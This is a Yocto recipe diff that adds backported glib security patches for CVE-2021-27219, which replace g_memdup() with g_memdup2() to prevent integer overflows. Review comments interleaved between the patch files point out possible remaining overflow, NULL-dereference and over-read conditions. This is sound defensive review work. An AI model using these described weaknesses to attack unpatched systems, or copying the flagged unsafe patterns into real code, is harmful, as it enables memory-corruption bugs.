@@ -0,0 +1,298 @@ +Backport of: + +From 0736b7c1e7cf4232c5d7eb2b0fbfe9be81bd3baa Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Thu, 4 Feb 2021 13:41:21 +0000 +Subject: [PATCH 04/11] glib: Use g_memdup2() instead of g_memdup() in obvious + places +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Convert all the call sites which use `g_memdup()`’s length argument +trivially (for example, by passing a `sizeof()` or an existing `gsize` +variable), so that they use `g_memdup2()` instead. + +In almost all of these cases the use of `g_memdup()` would not have +caused problems, but it will soon be deprecated, so best port away from +it + +In particular, this fixes an overflow within `g_bytes_new()`, identified +as GHSL-2021-045 by GHSL team member Kevin Backhouse. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> +Fixes: GHSL-2021-045 +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + glib/gbytes.c | 6 ++++-- + glib/gdir.c | 3 ++- + glib/ghash.c | 7 ++++--- + glib/giochannel.c | 5 +++-- + glib/gslice.c | 3 ++- + glib/gtestutils.c | 3 ++- + glib/gvariant.c | 7 ++++--- + glib/gvarianttype.c | 3 ++- + glib/tests/array-test.c | 4 +++- + glib/tests/option-context.c | 6 ++++-- + glib/tests/uri.c | 8 +++++--- + 11 files changed, 35 insertions(+), 20 deletions(-) + +--- a/glib/gbytes.c ++++ b/glib/gbytes.c +@@ -34,6 +34,8 @@ + + #include <string.h> + ++#include "gstrfuncsprivate.h" ++ + /** + * GBytes: + * +@@ -95,7 +97,7 @@ g_bytes_new (gconstpointer data, + { + g_return_val_if_fail (data != NULL || size == 0, NULL); + +- return g_bytes_new_take (g_memdup (data, size), size); ++ return g_bytes_new_take (g_memdup2 (data, size), size); + } + + /** 
+@@ -499,7 +501,7 @@ g_bytes_unref_to_data (GBytes *bytes, + * Copy: Non g_malloc (or compatible) allocator, or static memory, + * so we have to copy, and then unref. + */ +- result = g_memdup (bytes->data, bytes->size); ++ result = g_memdup2 (bytes->data, bytes->size); + *size = bytes->size; + g_bytes_unref (bytes); + } +--- a/glib/gdir.c ++++ b/glib/gdir.c +@@ -37,6 +37,7 @@ + #include "gconvert.h" + #include "gfileutils.h" + #include "gstrfuncs.h" ++#include "gstrfuncsprivate.h" + #include "gtestutils.h" + #include "glibintl.h" + +@@ -112,7 +113,7 @@ g_dir_open_with_errno (const gchar *path + return NULL; + #endif + +- return g_memdup (&dir, sizeof dir); ++ return g_memdup2 (&dir, sizeof dir); + } + + /** +--- a/glib/ghash.c ++++ b/glib/ghash.c +@@ -34,6 +34,7 @@ + #include "gmacros.h" + #include "glib-private.h" + #include "gstrfuncs.h" ++#include "gstrfuncsprivate.h" + #include "gatomic.h" + #include "gtestutils.h" + #include "gslice.h" +@@ -962,7 +963,7 @@ g_hash_table_ensure_keyval_fits (GHashTa + if (hash_table->have_big_keys) + { + if (key != value) +- hash_table->values = g_memdup (hash_table->keys, sizeof (gpointer) * hash_table->size); ++ hash_table->values = g_memdup2 (hash_table->keys, sizeof (gpointer) * hash_table->size); + /* Keys and values are both big now, so no need for further checks */ + return; + } +@@ -970,7 +971,7 @@ g_hash_table_ensure_keyval_fits (GHashTa + { + if (key != value) + { +- hash_table->values = g_memdup (hash_table->keys, sizeof (guint) * hash_table->size); ++ hash_table->values = g_memdup2 (hash_table->keys, sizeof (guint) * hash_table->size); + is_a_set = FALSE; + } + } +@@ -998,7 +999,7 @@ g_hash_table_ensure_keyval_fits (GHashTa + + /* Just split if necessary */ + if (is_a_set && key != value) +- hash_table->values = g_memdup (hash_table->keys, sizeof (gpointer) * hash_table->size); ++ hash_table->values = g_memdup2 (hash_table->keys, sizeof (gpointer) * hash_table->size); + + #endif + } +--- a/glib/giochannel.c ++++ 
b/glib/giochannel.c +@@ -35,7 +35,7 @@ + #include <errno.h> + + #include "giochannel.h" +- ++#include "gstrfuncsprivate.h" + #include "gstrfuncs.h" + #include "gtestutils.h" + #include "glibintl.h" + +@@ -1673,10 +1674,10 @@ g_io_channel_read_line (GIOChannel *cha + + /* Copy the read bytes (including any embedded nuls) and nul-terminate. + * `USE_BUF (channel)->str` is guaranteed to be nul-terminated as it’s a +- * #GString, so it’s safe to call g_memdup() with +1 length to allocate ++ * #GString, so it’s safe to call g_memdup2() with +1 length to allocate + * a nul-terminator. */ + g_assert (USE_BUF (channel)); +- line = g_memdup (USE_BUF (channel)->str, got_length + 1); ++ line = g_memdup2 (USE_BUF (channel)->str, got_length + 1); + line[got_length] = '\0'; + *str_return = g_steal_pointer (&line); + g_string_erase (USE_BUF (channel), 0, got_length); +--- a/glib/gslice.c ++++ b/glib/gslice.c +@@ -41,6 +41,7 @@ + #include "gmain.h" + #include "gmem.h" /* gslice.h */ + #include "gstrfuncs.h" ++#include "gstrfuncsprivate.h" + #include "gutils.h" + #include "gtrashstack.h" + #include "gtestutils.h" +@@ -350,7 +351,7 @@ g_slice_get_config_state (GSliceConfig c + array[i++] = allocator->contention_counters[address]; + array[i++] = allocator_get_magazine_threshold (allocator, address); + *n_values = i; +- return g_memdup (array, sizeof (array[0]) * *n_values); ++ return g_memdup2 (array, sizeof (array[0]) * *n_values); + default: + return NULL; + } +--- a/glib/gtestutils.c ++++ b/glib/gtestutils.c +@@ -49,6 +49,7 @@ + #include "gpattern.h" + #include "grand.h" + #include "gstrfuncs.h" ++#include "gstrfuncsprivate.h" + #include "gtimer.h" + #include "gslice.h" + #include "gspawn.h" +@@ -3803,7 +3804,7 @@ g_test_log_extract (GTestLogBuffer *tbuf + if (p <= tbuffer->data->str + mlength) + { + g_string_erase (tbuffer->data, 0, mlength); +- tbuffer->msgs = g_slist_prepend (tbuffer->msgs, g_memdup (&msg, sizeof (msg))); ++ tbuffer->msgs = g_slist_prepend (tbuffer->msgs, 
g_memdup2 (&msg, sizeof (msg))); + return TRUE; + } + +--- a/glib/gvariant.c ++++ b/glib/gvariant.c +@@ -33,6 +33,7 @@ + + #include <string.h> + ++#include "gstrfuncsprivate.h" + + /** + * SECTION:gvariant +@@ -725,7 +726,7 @@ g_variant_new_variant (GVariant *value) + g_variant_ref_sink (value); + + return g_variant_new_from_children (G_VARIANT_TYPE_VARIANT, +- g_memdup (&value, sizeof value), ++ g_memdup2 (&value, sizeof value), + 1, g_variant_is_trusted (value)); + } + +@@ -1229,7 +1230,7 @@ g_variant_new_fixed_array (const GVarian + return NULL; + } + +- data = g_memdup (elements, n_elements * element_size); ++ data = g_memdup2 (elements, n_elements * element_size); + value = g_variant_new_from_data (array_type, data, + n_elements * element_size, + FALSE, g_free, data); +@@ -1908,7 +1909,7 @@ g_variant_dup_bytestring (GVariant *valu + if (length) + *length = size; + +- return g_memdup (original, size + 1); ++ return g_memdup2 (original, size + 1); + } + + /** +--- a/glib/gvarianttype.c ++++ b/glib/gvarianttype.c +@@ -28,6 +28,7 @@ + + #include <string.h> + ++#include "gstrfuncsprivate.h" + + /** + * SECTION:gvarianttype +@@ -1181,7 +1182,7 @@ g_variant_type_new_tuple (const GVariant + g_assert (offset < sizeof buffer); + buffer[offset++] = ')'; + +- return (GVariantType *) g_memdup (buffer, offset); ++ return (GVariantType *) g_memdup2 (buffer, offset); + } + + /** +--- a/glib/tests/array-test.c ++++ b/glib/tests/array-test.c +@@ -29,6 +29,8 @@ + #include <string.h> + #include "glib.h" + ++#include "gstrfuncsprivate.h" ++ + /* Test data to be passed to any function which calls g_array_new(), providing + * the parameters for that call. Most #GArray tests should be repeated for all + * possible values of #ArrayTestData. 
*/ +@@ -1917,7 +1919,7 @@ byte_array_new_take (void) + GByteArray *gbarray; + guint8 *data; + +- data = g_memdup ("woooweeewow", 11); ++ data = g_memdup2 ("woooweeewow", 11); + gbarray = g_byte_array_new_take (data, 11); + g_assert (gbarray->data == data); + g_assert_cmpuint (gbarray->len, ==, 11); +--- a/glib/tests/option-context.c ++++ b/glib/tests/option-context.c +@@ -27,6 +27,8 @@ + #include <string.h> + #include <locale.h> + ++#include "gstrfuncsprivate.h" ++ + static GOptionEntry main_entries[] = { + { "main-switch", 0, 0, + G_OPTION_ARG_NONE, NULL, +@@ -256,7 +258,7 @@ join_stringv (int argc, char **argv) + static char ** + copy_stringv (char **argv, int argc) + { +- return g_memdup (argv, sizeof (char *) * (argc + 1)); ++ return g_memdup2 (argv, sizeof (char *) * (argc + 1)); + } + + static void +@@ -2323,7 +2325,7 @@ test_group_parse (void) + g_option_context_add_group (context, group); + + argv = split_string ("program --test arg1 -f arg2 --group-test arg3 --frob arg4 -z arg5", &argc); +- orig_argv = g_memdup (argv, (argc + 1) * sizeof (char *)); ++ orig_argv = g_memdup2 (argv, (argc + 1) * sizeof (char *)); + + retval = g_option_context_parse (context, &argc, &argv, &error); + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch new file mode 100644 index 0000000000..4f86522d00 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch 
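Review bot: In the `g_variant_new_fixed_array()` hunk the size passed to `g_memdup2()` is still the unchecked product `n_elements * element_size`, and the switch to `g_memdup2()` only removes the narrowing to `guint`, not a wrap in the multiplication itself. Both operands come from the caller, so a wrapped product would give a copy shorter than the array the caller described, and the same product is then handed to `g_variant_new_from_data()`. A guard that `n_elements <= G_MAXSIZE / element_size` ahead of the copy would close that gap. How `element_size` is validated is not visible here, because the function body begins above the hunk.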
@@ -0,0 +1,54 @@ +From 0cbad673215ec8a049b7fe2ff44b0beed31b376e Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Thu, 4 Feb 2021 16:12:24 +0000 +Subject: [PATCH 05/11] gwinhttpfile: Avoid arithmetic overflow when + calculating a size +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +The members of `URL_COMPONENTS` (`winhttp_file->url`) are `DWORD`s, i.e. +32-bit unsigned integers. Adding to and multiplying them may cause them +to overflow the unsigned integer bounds, even if the result is passed to +`g_memdup2()` which accepts a `gsize`. + +Cast the `URL_COMPONENTS` members to `gsize` first to ensure that the +arithmetic is done in terms of `gsize`s rather than unsigned integers. + +Spotted by Sebastian Dröge. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/win32/gwinhttpfile.c | 8 ++++---- + 1 file changed, 4 insertions(+), 4 deletions(-) + +diff --git a/gio/win32/gwinhttpfile.c b/gio/win32/gwinhttpfile.c +index 3f8fbd838..e0340e247 100644 +--- a/gio/win32/gwinhttpfile.c ++++ b/gio/win32/gwinhttpfile.c +@@ -410,10 +410,10 @@ g_winhttp_file_resolve_relative_path (GFile *file, + child = g_object_new (G_TYPE_WINHTTP_FILE, NULL); + child->vfs = winhttp_file->vfs; + child->url = winhttp_file->url; +- child->url.lpszScheme = g_memdup2 (winhttp_file->url.lpszScheme, (winhttp_file->url.dwSchemeLength+1)*2); +- child->url.lpszHostName = g_memdup2 (winhttp_file->url.lpszHostName, (winhttp_file->url.dwHostNameLength+1)*2); +- child->url.lpszUserName = g_memdup2 (winhttp_file->url.lpszUserName, (winhttp_file->url.dwUserNameLength+1)*2); +- child->url.lpszPassword = g_memdup2 
(winhttp_file->url.lpszPassword, (winhttp_file->url.dwPasswordLength+1)*2); ++ child->url.lpszScheme = g_memdup2 (winhttp_file->url.lpszScheme, ((gsize) winhttp_file->url.dwSchemeLength + 1) * 2); ++ child->url.lpszHostName = g_memdup2 (winhttp_file->url.lpszHostName, ((gsize) winhttp_file->url.dwHostNameLength + 1) * 2); ++ child->url.lpszUserName = g_memdup2 (winhttp_file->url.lpszUserName, ((gsize) winhttp_file->url.dwUserNameLength + 1) * 2); ++ child->url.lpszPassword = g_memdup2 (winhttp_file->url.lpszPassword, ((gsize) winhttp_file->url.dwPasswordLength + 1) * 2); + child->url.lpszUrlPath = wnew_path; + child->url.dwUrlPathLength = wcslen (wnew_path); + child->url.lpszExtraInfo = NULL; +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch new file mode 100644 index 0000000000..d8043f5e29 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch 
@@ -0,0 +1,101 @@ +From f9ee2275cbc312c0b4cdbc338a4fbb76eb36fb9a Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Thu, 4 Feb 2021 13:49:00 +0000 +Subject: [PATCH 06/11] gdatainputstream: Handle stop_chars_len internally as + gsize + +Previously it was handled as a `gssize`, which meant that if the +`stop_chars` string was longer than `G_MAXSSIZE` there would be an +overflow. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/gdatainputstream.c | 25 +++++++++++++++++-------- + 1 file changed, 17 insertions(+), 8 deletions(-) + +diff --git a/gio/gdatainputstream.c b/gio/gdatainputstream.c +index 2e7750cb5..2cdcbda19 100644 +--- a/gio/gdatainputstream.c ++++ b/gio/gdatainputstream.c +@@ -27,6 +27,7 @@ + #include "gioenumtypes.h" + #include "gioerror.h" + #include "glibintl.h" ++#include "gstrfuncsprivate.h" + + #include <string.h> + +@@ -856,7 +857,7 @@ static gssize + scan_for_chars (GDataInputStream *stream, + gsize *checked_out, + const char *stop_chars, +- gssize stop_chars_len) ++ gsize stop_chars_len) + { + GBufferedInputStream *bstream; + const char *buffer; +@@ -952,7 +953,7 @@ typedef struct + gsize checked; + + gchar *stop_chars; +- gssize stop_chars_len; ++ gsize stop_chars_len; + gsize length; + } GDataInputStreamReadData; + +@@ -1078,12 +1079,17 @@ g_data_input_stream_read_async (GDataInputStream *stream, + { + GDataInputStreamReadData *data; + GTask *task; ++ gsize stop_chars_len_unsigned; + + data = g_slice_new0 (GDataInputStreamReadData); +- if (stop_chars_len == -1) +- stop_chars_len = strlen (stop_chars); +- data->stop_chars = g_memdup (stop_chars, stop_chars_len); +- data->stop_chars_len = stop_chars_len; ++ ++ 
if (stop_chars_len < 0) ++ stop_chars_len_unsigned = strlen (stop_chars); ++ else ++ stop_chars_len_unsigned = (gsize) stop_chars_len; ++ ++ data->stop_chars = g_memdup2 (stop_chars, stop_chars_len_unsigned); ++ data->stop_chars_len = stop_chars_len_unsigned; + data->last_saw_cr = FALSE; + + task = g_task_new (stream, cancellable, callback, user_data); +@@ -1338,17 +1344,20 @@ g_data_input_stream_read_upto (GDataInputStream *stream, + gssize found_pos; + gssize res; + char *data_until; ++ gsize stop_chars_len_unsigned; + + g_return_val_if_fail (G_IS_DATA_INPUT_STREAM (stream), NULL); + + if (stop_chars_len < 0) +- stop_chars_len = strlen (stop_chars); ++ stop_chars_len_unsigned = strlen (stop_chars); ++ else ++ stop_chars_len_unsigned = (gsize) stop_chars_len; + + bstream = G_BUFFERED_INPUT_STREAM (stream); + + checked = 0; + +- while ((found_pos = scan_for_chars (stream, &checked, stop_chars, stop_chars_len)) == -1) ++ while ((found_pos = scan_for_chars (stream, &checked, stop_chars, stop_chars_len_unsigned)) == -1) + { + if (g_buffered_input_stream_get_available (bstream) == + g_buffered_input_stream_get_buffer_size (bstream)) +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch new file mode 100644 index 0000000000..f183939c45 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch 
@@ -0,0 +1,76 @@ +From 2aaf593a9eb96d84fe3be740aca2810a97d95592 Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Thu, 4 Feb 2021 13:50:37 +0000 +Subject: [PATCH 07/11] gwin32: Use gsize internally in g_wcsdup() +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This allows it to handle strings up to length `G_MAXSIZE` — previously +it would overflow with such strings. + +Update the several copies of it identically. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/gwin32registrykey.c | 34 ++++++++++++++++++++++++++-------- + 2 files changed, 38 insertions(+), 16 deletions(-) + +diff --git a/gio/gwin32registrykey.c b/gio/gwin32registrykey.c +index 548a94188..2eb67daf8 100644 +--- a/gio/gwin32registrykey.c ++++ b/gio/gwin32registrykey.c +@@ -127,16 +127,34 @@ typedef enum + G_WIN32_REGISTRY_UPDATED_PATH = 1, + } GWin32RegistryKeyUpdateFlag; + ++static gsize ++g_utf16_len (const gunichar2 *str) ++{ ++ gsize result; ++ ++ for (result = 0; str[0] != 0; str++, result++) ++ ; ++ ++ return result; ++} ++ + static gunichar2 * +-g_wcsdup (const gunichar2 *str, +- gssize str_size) ++g_wcsdup (const gunichar2 *str, gssize str_len) + { +- if (str_size == -1) +- { +- str_size = wcslen (str) + 1; +- str_size *= sizeof (gunichar2); +- } +- return g_memdup (str, str_size); ++ gsize str_len_unsigned; ++ gsize str_size; ++ ++ g_return_val_if_fail (str != NULL, NULL); ++ ++ if (str_len < 0) ++ str_len_unsigned = g_utf16_len (str); ++ else ++ str_len_unsigned = (gsize) str_len; ++ ++ g_assert (str_len_unsigned <= G_MAXSIZE / sizeof (gunichar2) - 1); ++ str_size = (str_len_unsigned + 1) * sizeof 
(gunichar2); ++ ++ return g_memdup2 (str, str_size); + } + + /** +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch new file mode 100644 index 0000000000..ffafc35c07 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch 
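Review bot: `g_wcsdup()` changes the meaning of a non-negative second argument: the old body passed `str_size` straight to `g_memdup()` as a byte count, while the new one treats `str_len` as a count of `gunichar2` units and copies `(str_len_unsigned + 1) * sizeof (gunichar2)` bytes. Any caller that still passes a byte size would now read past the end of its source buffer; the call sites are outside this hunk and need to be checked against the new contract. The patch header also says "2 files changed" and "Update the several copies of it identically", yet only the `gio/gwin32registrykey.c` hunk is present, so it is worth confirming whether another copy of `g_wcsdup()` in this tree was left on the old `g_memdup()` path. A short comment on the function, such as `/* str_len is in gunichar2 units, excluding the terminator; negative means nul-terminated */`, would pin the contract.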
@@ -0,0 +1,101 @@ +From ba8ca443051f93a74c0d03d62e70402036f967a5 Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Thu, 4 Feb 2021 13:58:32 +0000 +Subject: [PATCH 08/11] gkeyfilesettingsbackend: Handle long keys when + converting paths + +Previously, the code in `convert_path()` could not handle keys longer +than `G_MAXINT`, and would overflow if that was exceeded. + +Convert the code to use `gsize` and `g_memdup2()` throughout, and +change from identifying the position of the final slash in the string +using a signed offset `i`, to using a pointer to the character (and +`strrchr()`). This allows the slash to be at any position in a +`G_MAXSIZE`-long string, without sacrificing a bit of the offset for +indicating whether a slash was found. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/gkeyfilesettingsbackend.c | 21 ++++++++++----------- + 1 file changed, 10 insertions(+), 11 deletions(-) + +diff --git a/gio/gkeyfilesettingsbackend.c b/gio/gkeyfilesettingsbackend.c +index cd5765afd..25b057672 100644 +--- a/gio/gkeyfilesettingsbackend.c ++++ b/gio/gkeyfilesettingsbackend.c +@@ -33,6 +33,7 @@ + #include "gfilemonitor.h" + #include "gsimplepermission.h" + #include "gsettingsbackendinternal.h" ++#include "gstrfuncsprivate.h" + #include "giomodule-priv.h" + #include "gportalsupport.h" + +@@ -145,8 +146,8 @@ convert_path (GKeyfileSettingsBackend *kfsb, + gchar **group, + gchar **basename) + { +- gint key_len = strlen (key); +- gint i; ++ gsize key_len = strlen (key); ++ const gchar *last_slash; + + if (key_len < kfsb->prefix_len || + memcmp (key, kfsb->prefix, kfsb->prefix_len) != 0) +@@ -155,38 +156,36 @@ convert_path 
(GKeyfileSettingsBackend *kfsb, + key_len -= kfsb->prefix_len; + key += kfsb->prefix_len; + +- for (i = key_len; i >= 0; i--) +- if (key[i] == '/') +- break; ++ last_slash = strrchr (key, '/'); + + if (kfsb->root_group) + { + /* if a root_group was specified, make sure the user hasn't given + * a path that ghosts that group name + */ +- if (i == kfsb->root_group_len && memcmp (key, kfsb->root_group, i) == 0) ++ if (last_slash != NULL && (last_slash - key) == kfsb->root_group_len && memcmp (key, kfsb->root_group, last_slash - key) == 0) + return FALSE; + } + else + { + /* if no root_group was given, ensure that the user gave a path */ +- if (i == -1) ++ if (last_slash == NULL) + return FALSE; + } + + if (group) + { +- if (i >= 0) ++ if (last_slash != NULL) + { +- *group = g_memdup (key, i + 1); +- (*group)[i] = '\0'; ++ *group = g_memdup2 (key, (last_slash - key) + 1); ++ (*group)[(last_slash - key)] = '\0'; + } + else + *group = g_strdup (kfsb->root_group); + } + + if (basename) +- *basename = g_memdup (key + i + 1, key_len - i); ++ *basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key)); + + return TRUE; + } +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch new file mode 100644 index 0000000000..8efb7c720f --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch 
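Review bot: At the end of `convert_path()` the new `*basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key));` runs even when `strrchr()` found no slash, so `last_slash` is NULL in both the pointer and the length expression. That case is reachable whenever `kfsb->root_group` is set and the key contains no `/`, because only the no-root-group branch returns early on `last_slash == NULL`. The old loop left `i == -1` there, which made the same statement copy the whole key including its terminator. Guard it the way the `group` branch above already does, for example `*basename = last_slash != NULL ? g_memdup2 (last_slash + 1, key_len - (last_slash - key)) : g_strdup (key);`. The function's signature begins above the hunk.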
@@ -0,0 +1,100 @@ +From 65ec7f4d6e8832c481f6e00e2eb007b9a60024ce Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Thu, 4 Feb 2021 14:00:53 +0000 +Subject: [PATCH 09/11] =?UTF-8?q?gsocket:=20Use=20gsize=20to=20track=20nat?= + =?UTF-8?q?ive=20sockaddr=E2=80=99s=20size?= +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Don’t use an `int`, that’s potentially too small. In practical terms, +this is not a problem, since no socket address is going to be that big. + +By making these changes we can use `g_memdup2()` without warnings, +though. Fewer warnings is good. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/gsocket.c | 16 ++++++++++------ + 1 file changed, 10 insertions(+), 6 deletions(-) + +--- a/gio/gsocket.c ++++ b/gio/gsocket.c +@@ -75,6 +75,7 @@ + #include "gcredentialsprivate.h" + #include "glibintl.h" + #include "gioprivate.h" ++#include "gstrfuncsprivate.h" + + #ifdef G_OS_WIN32 + /* For Windows XP runtime compatibility, but use the system's if_nametoindex() if available */ +@@ -174,7 +175,7 @@ static gboolean g_socket_datagram_ba + GError **error); + + static GSocketAddress * +-cache_recv_address (GSocket *socket, struct sockaddr *native, int native_len); ++cache_recv_address (GSocket *socket, struct sockaddr *native, size_t native_len); + + static gssize + g_socket_receive_message_with_timeout (GSocket *socket, +@@ -260,7 +261,7 @@ struct _GSocketPrivate + struct { + GSocketAddress *addr; + struct sockaddr *native; +- gint native_len; ++ gsize native_len; + guint64 last_used; + } recv_addr_cache[RECV_ADDR_CACHE_SIZE]; + }; +@@ -5259,14 +5260,14 @@ 
g_socket_send_messages_with_timeout (GSo + } + + static GSocketAddress * +-cache_recv_address (GSocket *socket, struct sockaddr *native, int native_len) ++cache_recv_address (GSocket *socket, struct sockaddr *native, size_t native_len) + { + GSocketAddress *saddr; + gint i; + guint64 oldest_time = G_MAXUINT64; + gint oldest_index = 0; + +- if (native_len <= 0) ++ if (native_len == 0) + return NULL; + + saddr = NULL; +@@ -5274,7 +5275,7 @@ cache_recv_address (GSocket *socket, str + { + GSocketAddress *tmp = socket->priv->recv_addr_cache[i].addr; + gpointer tmp_native = socket->priv->recv_addr_cache[i].native; +- gint tmp_native_len = socket->priv->recv_addr_cache[i].native_len; ++ gsize tmp_native_len = socket->priv->recv_addr_cache[i].native_len; + + if (!tmp) + continue; +@@ -5304,7 +5305,7 @@ cache_recv_address (GSocket *socket, str + g_free (socket->priv->recv_addr_cache[oldest_index].native); + } + +- socket->priv->recv_addr_cache[oldest_index].native = g_memdup (native, native_len); ++ socket->priv->recv_addr_cache[oldest_index].native = g_memdup2 (native, native_len); + socket->priv->recv_addr_cache[oldest_index].native_len = native_len; + socket->priv->recv_addr_cache[oldest_index].addr = g_object_ref (saddr); + socket->priv->recv_addr_cache[oldest_index].last_used = g_get_monotonic_time (); +@@ -5452,6 +5453,9 @@ g_socket_receive_message_with_timeout (G + /* do it */ + while (1) + { ++ /* addrlen has to be of type int because that’s how WSARecvFrom() is defined */ ++ G_STATIC_ASSERT (sizeof addr <= G_MAXINT); ++ + addrlen = sizeof addr; + if (address) + result = WSARecvFrom (socket->priv->fd, diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch new file mode 100644 index 0000000000..63fda0b600 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch 
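Review bot: `cache_recv_address()` now takes `size_t native_len` and its guard changed from `native_len <= 0` to `native_len == 0`, so a negative `int` from a caller is no longer rejected. It converts to a very large size and reaches `g_memdup2 (native, native_len)`. The call sites are outside the hunks shown, and the Windows receive path keeps `addrlen` as an `int` per the added comment, so each caller should be confirmed to pass the length only after the receive call has succeeded. The prototype and definition use `size_t` while the cache struct field and `tmp_native_len` use `gsize`; one spelling throughout would be easier to read.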
@@ -0,0 +1,59 @@ +From 777b95a88f006d39d9fe6d3321db17e7b0d4b9a4 Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Thu, 4 Feb 2021 14:07:39 +0000 +Subject: [PATCH 10/11] gtlspassword: Forbid very long TLS passwords +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +The public API `g_tls_password_set_value_full()` (and the vfunc it +invokes) can only accept a `gssize` length. Ensure that nul-terminated +strings passed to `g_tls_password_set_value()` can’t exceed that length. +Use `g_memdup2()` to avoid an overflow if they’re longer than +`G_MAXUINT` similarly. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/gtlspassword.c | 10 ++++++++-- + 1 file changed, 8 insertions(+), 2 deletions(-) + +diff --git a/gio/gtlspassword.c b/gio/gtlspassword.c +index 1e437a7b6..dbcec41a8 100644 +--- a/gio/gtlspassword.c ++++ b/gio/gtlspassword.c +@@ -23,6 +23,7 @@ + #include "glibintl.h" + + #include "gioenumtypes.h" ++#include 